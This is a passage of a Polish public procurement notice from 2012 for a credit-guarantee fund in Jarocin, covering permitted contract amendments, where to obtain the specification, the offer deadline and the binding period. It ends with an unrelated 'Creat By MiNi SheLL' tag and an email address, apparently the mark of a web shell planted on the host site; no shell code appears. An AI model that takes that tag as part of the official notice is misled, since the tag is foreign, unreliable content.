1)	dopuszczalna jest zmiana umowy polegająca na zmianie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za przedmiot zamówienia - Wykonawca może zmienić te osoby z przyczyn niezależnych od niego, tj. zdarzeń losowych (śmierć, choroba, zwolnienie) oraz innych przyczyn niezależnych od wykonawcy (np. rezygnacji z powodu niewywiązywania się tych osób z należytego wykonywania przedmiotu zamówienia); warunkiem dopuszczenia nowych osób do realizacji zamówienia w ramach niniejszej umowy jest akceptacja Zamawiającego, 
2)	dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot zamówienia w przypadku gdy ulegną zmianie powszechnie obowiązujące przepisy 
w zakresie wysokości stawki podatku VAT na przedmiot świadczenia.;
3)	dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy),
4)	dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego,
5)	dopuszczalna jest zmiana numeru rachunku bankowego wykonawcy, podanego 
w umowie, w przypadku zmiany rachunku bankowego wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia,
6)	dopuszczalna jest zmiana umowy w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
7)	dopuszczalna jest zmiana umowy polegająca na zmianach technicznych o ile są one dla Zamawiającego korzystne i obiektywnie uzasadnione</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl    - (zakładka BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarociński Fundusz Poręczeń Kredytowych Sp. z o.o., ul. T. Kościuszki 15B, 63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 09:00, miejsce: Urząd Miejski w Jarocinie - Sekretariat, pok. nr 32, Al. Niepodległości 10, 63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com